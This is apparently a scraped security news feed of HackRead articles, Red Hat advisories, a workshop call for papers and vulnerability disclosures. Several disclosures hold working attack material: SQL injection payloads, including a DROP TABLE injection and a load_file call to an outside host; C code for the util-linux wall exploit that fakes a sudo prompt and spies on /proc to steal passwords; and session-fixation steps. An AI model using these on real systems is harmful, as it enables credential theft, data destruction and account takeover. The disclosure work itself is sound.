By Waqas
Are you a Python developer? Here's what you need to know!
This is a post from HackRead.com Read the original post: PyPI Suspends New Projects and Users Due to Malicious Packages

PyPI hit by malware attack! Malicious packages targeting crypto wallets & browser data. Platform suspends new users & projects. Learn how to stay safe and what you should do.

_This article has been updated with new information._

In a move to combat a large-scale malware campaign, the Python Package Index (PyPI), the official repository for third-party Python software, has suspended new user registration and project creation. This critical action comes after security researchers at Checkmarx identified a series of malicious packages targeting unsuspecting developers.

According to PyPI’s official update released on March 28th, 2024, at 2:16 UTC, the platform is taking proactive measures to “mitigate an ongoing malware upload campaign.” This suspension aims to disrupt the attackers’ efforts and protect the vast Python developer community.

****Checkmarx Discovers Deceptive Software****

The security team at Checkmarx identified a coordinated effort by threat actors to upload malicious packages onto PyPI. These packages are designed to exploit a common vulnerability known as typosquatting. Typosquatting tricks users into installing malware by using names and website addresses that closely resemble those of legitimate software.

Once installed, these malicious packages unleash a multi-stage attack. The initial payload targets a user’s cryptocurrency wallets, aiming to steal valuable digital assets. The attackers further expand their reach by scraping sensitive data from browsers, including cookies and extension information. Additionally, the malware attempts to steal various login credentials, potentially compromising a user’s entire digital ecosystem.

According to Checkmarx’s research shared with Hackread.com ahead of publication on Thursday, the most concerning aspect of this attack is the malware’s persistence mechanism. This mechanism allows the malware to survive system reboots, ensuring its continued operation even after a restart. This persistence significantly increases the difficulty of detection and eradication.

****PyPI Fights Back****

PyPI’s quick suspension of new user registration and project creation shows the platform’s commitment to user safety. This action also potentially disrupts the attackers’ ability to upload new malicious packages and provides PyPI with time to implement more robust security measures.

****What Developers Should Do****

While PyPI works to address the situation, developers are advised to exercise extreme caution when installing Python packages. Here are some essential security practices:

*   **Double-check package names and sources:** Meticulously verify the spelling and origin of any package before installation. Typosquatting relies on tricking users into installing the wrong software.
*   **Verify publisher reputation:** Research the publisher behind a package before trusting it. Look for established developers with a history of creating reliable software.
*   **Read reviews and ratings:** User reviews and ratings can offer valuable insights into a package’s legitimacy and functionality.
*   **Stay informed:** Keep yourself updated on the latest security threats targeting PyPI and the Python community.

****The Future of PyPI Security****

The PyPI security team is working to identify and remove all malicious packages from the platform. Additionally, they will be implementing tougher measures to prevent similar attacks in the future. Developers can expect further announcements from PyPI regarding the timeline for resuming new user registration and project creation.

This incident goes on to show how sophisticated cyberattacks have become especially when targeting the software development community. By working together, developers, security researchers, and platform operators like PyPI can create a safer and more secure environment for everyone.

****UPDATE Mar 28, 2024 – 12:56 UTC****

As of March 28, 2024, 12:56 UTC, PyPI’s official website states, “This incident has been resolved,” indicating that the registration of new projects and users is now enabled again.

1.  Why is learning Python important in Data Science?
2.  OpenSSF Launches Malicious Packages Repository
3.  6 official Python repositories plagued with cryptomining malware
4.  Crypto Stealing PyPI Malware Hits Both Windows and Linux Users
5.  GitHub Abused to Spread Malicious Packages on PyPI in Image Files

PyPI Suspends New Projects and Users Due to Malicious Packages

Event Management version 1.0 suffers from a remote SQL injection vulnerability.

    # Exploit Title: Event Management - SQL Injection# Application: Event Management# Date: 19.02.2024# Bugs: SQL Injection # Exploit Author: SoSPiro# Vendor Homepage: https://github.com/PuneethReddyHC# Software Link: https://github.com/PuneethReddyHC/event-management# Version:1.0# Attack Type: Remote# Tested on: Windows 10 64 bit Wampserver # About project:helps to register an users for on events conducted in college fests with simple logic with secured way## Vulnerability Details:- **Application Name**: Event Management- **Software Link**: [Download Link](https://github.com/PuneethReddyHC/event-management)- **Vendor Homepage**: [Vendor Homepage](https://github.com/PuneethReddyHC)# Vulnerable code section:# https://github.com/PuneethReddyHC/event-management/blob/master/backend/register.php#L64<?php// ... (other code)if(empty($full_name)  || empty($email)  || empty($mobile)) {    // Error messages and actions for incomplete data} else {    if(!preg_match($name,$full_name)){        // Error messages and actions for invalid full name    }    // Additional regex checks for email and mobile format    // Verifying mobile number length    if(!(strlen($mobile) == 10)){        // Error message and action for invalid mobile number length    }    // Database insertion operation    $sql = "INSERT INTO `participants`             (`p_id`,`event_id`, `fullname`, `email`,              `mobile`,  `college`, `branch`)             VALUES (NULL,'$event_id', '$full_name',  '$email',              '$mobile', '$college', '$branch')";                if(mysqli_query($con,$sql)){        // Successful registration message        echo "register_success";        echo "<script> location.href='index.php'; </script>";        exit;    }}// ... (other code)?># Vulnerability Description:The code in register.php is vulnerable to SQL injection, allowing an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database. Additionally, the code lacks proper input validation and sanitization, making it susceptible to various forms of attacks such as cross-site scripting (XSS) and potential security risks.# Proof of Concept (PoC):SQL Injection:The vulnerability can be exploited by an attacker by manipulating the input parameters. For example, the event_id parameter is directly used in the SQL query without proper validation or parameterization:An attacker can manipulate the event_id parameter in the HTTP request to inject malicious SQL code.PoC:POST /event-management-master/backend/register.php HTTP/1.1Host: localhostevent_id=1'; DROP TABLE participants; --This could result in a SQL query like:INSERT INTO `participants` (`p_id`,`event_id`, `fullname`, `email`, `mobile`,  `college`, `branch`) VALUES (NULL,'1'; DROP TABLE participants; --', 'test', 'test@gmail.com', '0555555555', 'asd', 'qwe')To mitigate this, use prepared statements or parameterized queries to ensure proper sanitization of user inputs.

Event Management 1.0 SQL Injection

The util-linux wall command does not filter escape sequences from command line arguments. The vulnerable code was introduced in commit cdd3cc7fa4 (2013). Every version since has been vulnerable. This allows unprivileged users to put arbitrary text on other users terminals, if mesg is set to y and wall is setgid. CentOS is not vulnerable since wall is not setgid. On Ubuntu 22.04 and Debian Bookworm, wall is both setgid and mesg is set to y by default.

Wall-Escape (CVE-2024-28085)

Skyler Ferrante: Escape sequence injection in util-linux wall

=================================================================  
Summary  
=================================================================

The util-linux wall command does not filter escape sequences from  
command line arguments. The vulnerable code was introduced in  
commit cdd3cc7fa4 (2013). Every version since has been  
vulnerable.

This allows unprivileged users to put arbitrary text on other  
users terminals, if mesg is set to y and wall is setgid. CentOS  
is not vulnerable since wall is not setgid. On Ubuntu 22.04 and  
Debian Bookworm, wall is both setgid and mesg is set to y by  
default.

If a system runs a command when commands are not found, with the  
unknown command as an argument, the unknown command will be  
leaked. This is true of Ubuntu 22.04. Debian Bookworm does not  
leak unknown commands in its starting configuration.

On Ubuntu 22.04, we have enough control to leak a users password  
by default. The only indication of attack to the user will be an  
incorrect password prompt when they correctly type their  
password, along with their password being in their command  
history.

On other systems that allow wall messages to be sent, an attacker  
may be able to alter the clipboard of a victim. This works on  
windows-terminal, but not on gnome-terminal.

=================================================================  
Analysis  
=================================================================

When displaying inputs from stdin, wall uses the function  
fputs_careful in order to neutralize escape characters.

Unfortunately, wall does not do the same for input coming from  
argv.

term-utils/wall.c (note that mvec is argv)  
```  
/*  
* Read message from argv[]  
*/  
int i;

for (i = 0; i < mvecsz; i++) {  
  fputs(mvec[i], fs);  
  if (i < mvecsz - 1)  
          fputc(' ', fs);  
}  
fputs("\r\n", fs);  
...

/*  
 * Read message from stdin.  
 */  
while (getline(&lbuf, &lbuflen, stdin) >= 0)  
        fputs_careful(lbuf, fs, '^', true, TERM_WIDTH);  
```

Since argv is attacker controlled, and can contain binary data,  
this is exploitable. A simple PoC command:

        wall $(printf "\033[33mHI")

If you are vulnerable, this should show a broadcast with "HI"  
being yellow. If we instead run:

        echo $(printf "\033[33mHI") | wall

This should fail with "^[[33m" showing up before our message.

To make sure the PoC will work, make sure your victim user can  
actually receive messages. First check that mesg is set to y  
(`mesg y`). If a user does not have mesg turned on, they are not  
exploitable.

If you still can't receive messages, try running `su user` or  
accessing the machine through SSH. Note that just because you  
can't receive messages without first going through su/SSH, does  
not mean a user is not vulnerable.  
=================================================================  
Exploitation  
=================================================================

Most distros allow argument data to be seen by unprivileged  
users, and some distros run commands when commands are not found.  
We can use this to leak a users password by tricking them into  
giving their password as a command to run.

When I run the command xsnow in my terminal, I get the following  
output:  
```  
Command 'xsnow' not found, but can be installed with:  
sudo apt install xsnow  
```

Lets look at what new processes are created when I do this:  
```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- xsnow  
/usr/bin/snap advise-snap --format=json --command xsnow  
```

This is on Ubuntu, but similar commands exist on other systems.

As a simple demonstration let's create a fake sudo prompt for  
gnome-terminal, and then spy on /proc/$pid/cmdline.

fake sudo prompt:  
```  
#include<stdio.h>  
#include<unistd.h>

int main(){  
        char* argv[] = {"prog",  
                "\033[3A" // Move up 3  
                "\033[K"  // Delete prompt  
                "[sudo] password for a_user:"  
                "\033[?25l"  
                // Set forground RGB (48,10,36)  
                //      hide typing  
                "\033[38;2;48;10;36m",  
        NULL};

        char* envp[] = {NULL};

        execve("/usr/bin/wall", argv, envp);  
}  
```

cmdline spy:  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>

#define USLEEP_TIME 2000

int main(){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();

                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        int num = atoi(d_name);

                        if(num > current_max_pid){  
                                next_max_pid = num;  
                        }else{  
                                continue;  
                        }

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\n';

                        write(1, buf, ra);  
                }  
                current_max_pid = next_max_pid;  
                closedir(proc_dir);  
        }  
}  
```

If we run the cmdline spy and the sudo password prompt, the user  
may input their password as a command. It will look like the  
following on Ubuntu:

```  
-bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperSecretPassword!  
/usr/bin/snap advise-snap --format=json --command SuperSecretPassword!  
```

Some distros, like Debian, do not seem to have a command like  
command-not-found by default. There does not seem to be a way to  
leak a users password in this case then, even though we can send  
escape sequences to them.

This works, but the user has no reason to expect a password page  
at this point. Now that we have shown some exploitability, lets  
try and make it better.

Imagine we run the cmdline spy in one terminal, and then in  
another terminal we run `sudo systemctl status cron.service`.  
The spy will see the sudo process first, and then after the user  
types their password correctly they will see `systemctl status  
cron.service`.

```  
sudo systemctl status cron.service  
systemctl status cron.service  
```

An attacker could inject a password incorrect message as soon as  
the second process starts (password correct). The user will  
assume they typed their password incorrectly and enter it again.

watch for certain command  
```  
#include<stdio.h>  
#include<sys/types.h>  
#include<sys/stat.h>  
#include<fcntl.h>  
#include<unistd.h>  
#include<ctype.h>  
#include<stdlib.h>  
#include<dirent.h>  
#include<time.h>  
#include<string.h>

#define USLEEP_TIME 3000

int main(int argc, char** argv){  
        pid_t current_max_pid = 0, next_max_pid;  
        char current_file_name[BUFSIZ];  
        char buf[BUFSIZ];

        DIR* proc_dir;  
        struct dirent *dir_e;  
        int curr_e_fp;

        if(argc != 2){  
                printf("Usage: prog search_string\n");  
                return 1;  
        }

        while(1){  
                proc_dir = opendir("/proc");  
                if(!proc_dir)  
                        abort();  
                usleep(USLEEP_TIME);  
                while((dir_e = readdir(proc_dir)) != NULL){  
                        char* d_name = dir_e->d_name;

                        // If not a digit (not a process folder)  
                        if(!isdigit(*d_name))  
                                continue;

                        snprintf(current_file_name,  
sizeof(current_file_name), "%s%s%s", "/proc/", d_name, "/cmdline");  
                        curr_e_fp = open(current_file_name, O_RDONLY);  
                        int ra = read(curr_e_fp, buf, BUFSIZ-1);  
                        close(curr_e_fp);

                        for(int i = 0; i<ra-1; i++)  
                                if(buf[i] == '\0') buf[i] = ' ';

                        // guaranteed to be in-bounds  
                        buf[ra-1] = '\0';

                        // Check if proces is us  
                        if(strstr(buf, argv[0])){  
                                continue;  
                        }  
                        // Check against search string  
                        if(!strcmp(buf, argv[1])){  
                                write(1, buf, ra);  
                                write(1, "\n", 1);  
                                return 0;  
                        }  
                }  
                closedir(proc_dir);  
        }  
}  
```

Imagine our new spy code was compiled as watch, and our wall  
exploit was called throw.

We can now run:  
```  
./watch "sudo systemctl start sshd"; ./watch "systemctl start sshd";  
sleep .1; ./throw  
```

The first two commands will wait until the user runs

        sudo systemctl start sshd

and correctly types their password for sudo. Then our wall  
exploit sends our fake sudo prompt. We need to sleep for a short  
duration to make sure we cover up the command prompt.

During this process, we need to make sure our original spy code  
is logging all cmdline arguments, to recover the victims password

Example log from original spy:  
```  
./watch sudo systemctl start sshd  
sudo systemctl start sshd  
./watch systemctl start sshd  
systemctl start sshd  
bash  
./throw  
bash  
/usr/bin/python3 /usr/lib/command-not-found -- SuperStrongPassword  
/usr/bin/snap advise-snap --format=json --command SuperStrongPassword  
```

Now lets imagine a different style of attack. An attacker can  
change a users clipboard through escape sequences on some  
terminals. For example, windows-terminal supports this. Gnome  
terminal does not.

```  
#include<stdio.h>

int main(){  
        printf("\033]52;c;QXR0YWNrZXIgbWVzc2FnZQo=\a");  
}  
```

Since we can send escape sequences through wall, if a user is  
using a terminal that supports this escape sequence, an attacker  
can change the victims clipboard to arbitrary text.

Further references:  
  https://people.rit.edu/sjf5462/6831711781/wall_2_27_2024.txt  
  https://github.com/skyler-ferrante/CVE-2024-28085

util-linux wall Escape Sequence Injection

The 13th International Workshop on Cyber Crime, or IWCC, 2024 call for papers has been announced. It will take place July 30th through August 2nd, 2024 in Vienna, Austria.

    [APOLOGIES FOR CROSS-POSTING]CALL FOR PAPERS13th International Workshop on Cyber Crime (IWCC 2024 -https://www.ares-conference.eu/iwcc/)to be held in conjunction with the 19th International Conference onAvailability, Reliability and Security (ARES 2024 -http://www.ares-conference.eu) July 30 - August 02, 2024, Vienna, AustriaIMPORTANT DATESSubmission Deadline  May 12, 2024Author Notification  May 29, 2024Proceedings Version  June 18, 2024Conference    July 30 - August 02, 2024WORKSHOP DESCRIPTIONThe societies of today's world are becoming increasingly dependent on onlineservices, where commercial activities, business transactions, governmentservices and biomedical diagnostics are realized. This tendency has beenevident during the recent COVID-19 pandemic. These developments, along withthe growing number of military conflicts worldwide (Ukraine, Israel, etc.),have led to the fast development of new cyber threats and numerousinformation security issues that are exploited by cybercriminals. Theinability to provide trusted, secure services in contemporary computernetwork technologies has a tremendous socio-economic impact on globalenterprises as well as individuals.Moreover, the frequently occurring international frauds impose the necessityto conduct investigations spanning multiple domains and countries. Suchexamination is often subject to different jurisdictions and legal systems. Agood illustration of the above is the Internet, which has made it easier toprepare and perpetrate traditional - but now cyber-enabled - crimes. It hasacted as an alternate avenue for criminals to conduct their activities andlaunch attacks with relative anonymity, a high degree of deniability, andthe opportunity to operate in a border-agnostic environment. Worryingdevelopments in the abuse of artificial intelligence and machine learningtechnologies lead to the increased capabilities of malign actors wholeverage these tools to design and propagate disinformation, which isespecially dangerous (and effective) during emergencies and crises of allkinds. The developments in Generative Artificial Intelligence have alsoenabled the increase of criminal capabilities in the production,dissemination, and weaponization of high-quality, convincing fake contact(text, audio, images, and videos), which translates not only to the truthand trust decay among the affected societies but also to the enhancedcapabilities in orchestrating the sophisticated cyber crimes. Furthermore, nowadays, the majority of life-science-based techniques andresulting data hinge on information technologies. Despite their considerableadvantages, dependence on cyber technologies also exposes vulnerabilities.Various threats in the digital realm could target biomedical systems,leading to adverse consequences. The field of CyberBioSecurity wasestablished to assist bio-related sciences in comprehending potential cyberthreats and formulating defense approaches, recovery protocols, andresilience strategies. The increased complexity of communications and thenetworking infrastructure is making the investigation of these new types ofcrimes difficult. Traces of illegal digital activities are difficult toanalyze due to large volumes of data. Nowadays, the digital crime scenefunctions like any other network, with dedicated administrators functioningas the first responders. This poses new challenges for law enforcement and intelligence communitiesand forces computer societies to utilize digital forensics to combat theincreasing number of cybercrimes. Forensic professionals must be fullyprepared to be able to provide court-admissible evidence. To make thesegoals achievable, forensic techniques should keep pace with newtechnologies. Prevention, mitigation, and interdiction of new and emergingthreats necessitates an increasingly thorough and multidisciplinaryapproaches, but also requires the collaboration of all relevant actors andstakeholders in designing the technology regulation and cyber governancemeasures.The aim of this workshop is to bring together the research outcomes providedby researchers from academia and the industry. The other goal is to show thelatest research results in digital forensics and cyberbiosecurity amongstothers. We strongly encourage prospective authors to submit articlespresenting both theoretical approaches and practical case reviews, includingwork-in-progress reports.TOPICS OF INTEREST INCLUDE, BUT ARE NOT LIMITED TO:- Big Data analytics helping to track cybercrimes- Protecting Big Data against cybercrimes- Crime-as-a-service- Criminal abuse of clouds and social networks- Criminal to criminal (C2C) communications- Criminal to victim (C2V) communications- Criminal use of IoT, e.g., IoT-based botnets- Cyberbiosecurity- Cybercrime-related investigations- Cybercrimes: evolution, new trends and detection- Darknets and hidden services- Fake (incl. deepfake) and disinformation detection- Generative Artificial Intelligence and cyber crime- AI-enabled crime and terrorism- Mobile malware- Network anomaly detection- Network traffic analysis, traceback and attribution- Incident response, investigation and evidence handling- Internet governance- Novel techniques in exploit kits- Political and business issues related to digital forensics andanti-forensic - techniques- Anti-forensic techniques and methods- Identification, authentication and collection of digital evidence- Integrity of digital evidence and live investigations- Privacy issues in digital forensics- Ransomware: evolution, functioning, types, etc.- Steganography/steganalysis and covert/subliminal channels- Technology regulation- Novel applications of information hiding in networks- Watermarking and intellectual property theft- Weaponization of information - cyber-enhanced disinformation campaignsWORKSHOP CHAIRSArtur Janicki, Warsaw University of Technology, Poland; Kacper Gradoñ, Warsaw University of Technology, Poland;Katarzyna Kamiñska, Warsaw University of Technology, PolandSUBMISSION GUIDELINESThe submission guidelines valid for the workshop are the same as for theARES conference. They can be found athttps://www.ares-conference.eu/authors-area.

IWCC 2024 Call For Papers

FusionPBX suffers from a session fixation vulnerability.

*Vulnerability Name - *Application is Vulnerable to Session Fixation

*Vulnerable URL: *www.fusionpbx.com

*Overview of the Vulnerability*  
Session fixation is a security vulnerability that occurs when an attacker  
sets or fixes a user's session identifier, manipulating the authentication  
process. Typically exploited in web applications, this vulnerability allows  
the attacker to force a user's session ID to a known value, granting  
unauthorized access. Attackers can initiate the attack by tricking users  
into using a provided session ID or by planting a session ID through  
various means.

*Steps to Reproduce*  
Step 1: To reproduce this vulnerability open two browsers. Copy "PHPSESSID"  
cookie from Browser 1 and paste it to Browser 2.  
Step 2: Login in Browser 1 using valid credentials.  
Step 3: Navigate to Browser 2 and refresh the page or open this URL (  
https://www.fusionpbx.com/app/account/home.php)  
Step 4: Successfully logged in Browser 2 without entering the credentials.

*Impact of Vulnerability:*  
Anyone can easily hijack victims or user's sessions and get into his account  
. Cookie stealing is the best way the hacker can get into account.. it  
would not take more than 5 min to steal someone's cookie using PHP and all  
.....  
Even friends can fool the victim and get him hacked...

*Mitigation:*Manage sessions properly. This problem is mainly faced because  
the session doesn't get expired or doesn't get closed when logout is  
pressed. Each time the user logins the cookie must hold a unique different  
session-id to proceed.

------------------------------------------------------------------------------------------------------

*FusionPBX Development Team Implemented Fix GitHub Commit Links:*  
https://github.com/fusionpbx/fusionpbx/commit/50220d7a0674fae944a1e16fab7a8517cdc51a9e  
https://github.com/fusionpbx/fusionpbx/commit/560a51cff710df12c863de53c4c8289e1516dae8

FusionPBX Session Fixation

By Waqas
Masa Network’s AI Data Marketplace will be an interoperable network for the world’s personal data, launching across multiple blockchains from day one.
This is a post from HackRead.com Read the original post: Masa Network Integrates with LayerZero to Power Its Cross-chain AI Data Network

Masa Network, the world’s leading decentralized personal data network, has announced its integration with LayerZero, an interoperability protocol that seamlessly connects blockchains and allows developers to build omnichain applications, tokens and experiences.

The integration with LayerZero will enable communication for the Masa Data Network which will be launched on a dedicated Avalanche Subnet, with Ethereum and Binance Smart Chain. The MASA token interoperability will further expand to Polygon, Base, Celo and more in the future via LayerZero’s Omnichain Fungible Token (OFT) Standard, which enables native cross-chain token transfers.

Masa is set to launch its native MASA token alongside the Network Mainnet on or around April 11th, 2024. Masa aims to shift the control of personal data back to users in the AI era. A person’s digital footprint and social graph are encrypted and stored in a completely private way in a Zero-Knowledge Soulbound Tokens (zkSBTs) data locker on the Masa Network. Users can own, share and earn from their data to train AI models, power AI agents, and power innovative AI applications. 

Users earn MASA tokens as rewards when their data is used by developers to power the decentralized AI economy.

Calenthia Mei, the Co-founder of Masa, said, “Masa is thrilled to be integrating with LayerZero Labs, which has become the industry standard for interoperability. Masa wants to empower users to own, share, and earn from their data, no matter which blockchain network their data is on. With LayerZero’s support, we are excited to be  cross-chain and interoperable from the very beginning.”

With the explosion of AI models, Masa has emerged as a leader in supplying vast amounts of privacy-first personal training data, powering the future of AI applications. It has amassed over 1.4 million unique wallets and over 37 million proprietary data points. 

Developers can utilize Masa Network’s massive collection of private-by-default user data to train AI models, build innovative apps, power decentralized advertising, and more. Masa will also be providing out-of-the-box large-language models for real-time data searching within the network. 

Simon Baksys, VP of Business of Development at LayerZero, commented “We are excited to collaborate with Masa to enhance privacy and innovation in AI development. The integration of LayerZero infrastructure with Masa’s ecosystem will enable accelerated development of personalized AI applications while ensuring user data remains private and secure.”

****About LayerZero****

LayerZero is an interoperability protocol that connects blockchains (50+ and counting), allowing developers to build seamless omni-chain applications, tokens, and experiences. The protocol relies on immutable on-chain endpoints, a configurable Security Stack, and a permissionless set of executors to transfer censorship-resistant messages between chains. For more information, visit: Website.

****About Masa****

Masa is the world’s data network, empowering users to own, share and earn from their data. In the AI era, Masa is building a scalable, secure, and resilient global data market, where millions of developers can build innovative applications using privacy-first user data. 

Masa has amassed over 1.3 million unique wallets and over 37 million proprietary data points in its exponential growth since its launch in August 2022. It has raised more than $9.2 million in funding from leading investors such as DCG, Anagram and GoldenTree, and was incubated by Coinlist’s Seed Program and Binance’s Most-Valuable-Builder Accelerator. For more information, visit their website or contact Calanthia Mei at \[email protected\].

1.  What is Blockchain Gaming and its Play-to-Earn Model?
2.  The Rise of Blockchain Gaming and Secure Marketplaces
3.  Enhancing Blockchain Randomness To Eliminate Trust Issues
4.  Blockchain Using API Security Data to Mitigate Web3 Threats
5.  Signal21 Beta Launch Bridges Gap in Blockchain Intel Services

Masa Network Integrates with LayerZero to Power Its Cross-chain AI Data Network

Red Hat Security Advisory 2024-1557-03 - An update is now available for Red Hat OpenShift Builds 1.0. Issues addressed include denial of service and traversal vulnerabilities.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1557.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Critical: Errata Advisory for Red Hat OpenShift Builds 1.0.1Advisory ID:        RHSA-2024:1557-03Product:            Builds for Red Hat OpenShiftAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:1557Issue date:         2024-03-28Revision:           03CVE Names:          CVE-2023-48795====================================================================Summary: An update is now available for Red Hat OpenShift Builds 1.0.Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Builds 1.0.Security Fix(es):* CVE-2023-48795 ssh: Prefix truncation attack on Binary Packet Protocol (BPP)* CVE-2023-49569 go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients* CVE-2023-49568 go-git: Maliciously crafted Git server replies can cause DoS on go-git clientsFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2023-48795References:https://access.redhat.com/security/updates/classification/#criticalhttps://bugzilla.redhat.com/show_bug.cgi?id=2254210https://bugzilla.redhat.com/show_bug.cgi?id=2258143https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-1557-03

Red Hat Security Advisory 2024-1549-03 - Updated images are now available for Red Hat Advanced Cluster Security. The updated image includes bug and security fixes. Issues addressed include a traversal vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_1549.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: ACS 4.3 enhancement and security update  
Advisory ID:        RHSA-2024:1549-03  
Product:            Red Hat Advanced Cluster Security for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:1549  
Issue date:         2024-03-28  
Revision:           03  
CVE Names:          CVE-2019-25210  
====================================================================

Summary: 

Updated images are now available for Red Hat Advanced Cluster Security. The  
updated image includes bug and security fixes.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

This release of RHACS 4.3.6 provides the following bug fix:

* Fixed an issue where an incorrectly configured Jira notifier causes the Central component of RHACS to enter a crash loop

It provides the following security fixes:

* go-git: Maliciously crafted Git server replies can lead to path traversal and RCE on go-git clients (CVE-2023-49569)  
* helm: Missing YAML content leads to panic (CVE-2024-26147)  
* helm: Shows secrets with --dry-run option in clear text (CVE-2019-25210)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

CVEs:

CVE-2019-25210

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2265440  
https://issues.redhat.com/browse/ROX-23314

Red Hat Security Advisory 2024-1549-03

LMS PHP version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: LMS-PHP-byoretnom23-v1.0 Multiple-SQLi## Author: nu11secur1ty## Date: 03/28/2024## Vendor: https://github.com/oretnom23## Software: https://www.sourcecodester.com/php/17268/computer-laboratory-management-system-using-php-and-mysql.html#comment-104400## Reference: https://portswigger.net/web-security/sql-injection## Description:The id parameter appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\95ctkydmc3d4ykhxxtph7p6xgomiagy71vsij68.tupgus.com\\mpk'))+'was submitted in the id parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed. The attacker can get all information from the system byusing this vulnerability!STATUS: HIGH- Vulnerability[+]Payload:```mysql---Parameter: id (GET)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: page=user/manage_user&id=7''' RLIKE (SELECT (CASE WHEN(2375=2375) THEN 0x372727 ELSE 0x28 END)) AND 'fkKl'='fkKl    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: page=user/manage_user&id=7''' AND (SELECT 1734FROM(SELECT COUNT(*),CONCAT(0x716a707071,(SELECT(ELT(1734=1734,1))),0x71717a7871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'CYrv'='CYrv    Type: time-based blind    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)    Payload: page=user/manage_user&id=7''' AND (SELECT 6760 FROM(SELECT(SLEEP(7)))iMBe) AND 'xzwU'='xzwU    Type: UNION query    Title: MySQL UNION query (NULL) - 11 columns    Payload: page=user/manage_user&id=-2854' UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a707071,0x6675797766656155594373736b724a5a6875526f6f65684562486c48664e4d624f75766b4a444b43,0x71717a7871),NULL,NULL,NULL,NULL,NULL,NULL#---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/LMS-PHP-byoretnom23-v1.0)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2024/03/lms-php-byoretnom23-v10-multiple-sqli.html)## Time spent:01:15:00

LMS PHP 1.0 SQL Injection

By Uzair Amir
Singapore, 28 March 2024 – GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report…
This is a post from HackRead.com Read the original post: GoPlus Report: Blockchain Networks Using API Security Data to Mitigate Web3 Threats

**Singapore, 28 March 2024** – GoPlus Labs, the leading Web3 security infrastructure provider, has unveiled a groundbreaking report that highlights the growing, widespread use and potential of Web3 user security data to aid in risk management.

The findings of the report reveal a clear and growing demand for more advanced security tools that can effectively safeguard digital assets, verify the authenticity of nonfungible tokens (**NFTs**) and monitor decentralized applications for threats. 

The report, “Uncharted Consensus: The Widespread Use and Potential of User Security Data in Web3”, showcases the rapid adoption of GoPlus’s API suite, which provides Web3 industry stakeholders with unparalleled insights into the health and vulnerability of various cryptocurrencies, NFTs and decentralized applications. At the same time, it also underscores the unique role GoPlus plays in addressing Web3’s most pressing security challenges.

GoPlus is the developer of an API suite that’s designed to address the multifaceted challenges of Web3 user security, enabling targeted data analysis across key aspects of the industry. Its modules include a Token RIsk API and NFT Risk API that evaluate the risk associated with different cryptocurrencies and non-fungible tokens; a Malicious address API for monitoring and reporting malicious addresses; a dApp Security API for real-time monitoring and threat detection in decentralized applications; and an Approval API for checking malicious approval of an address.

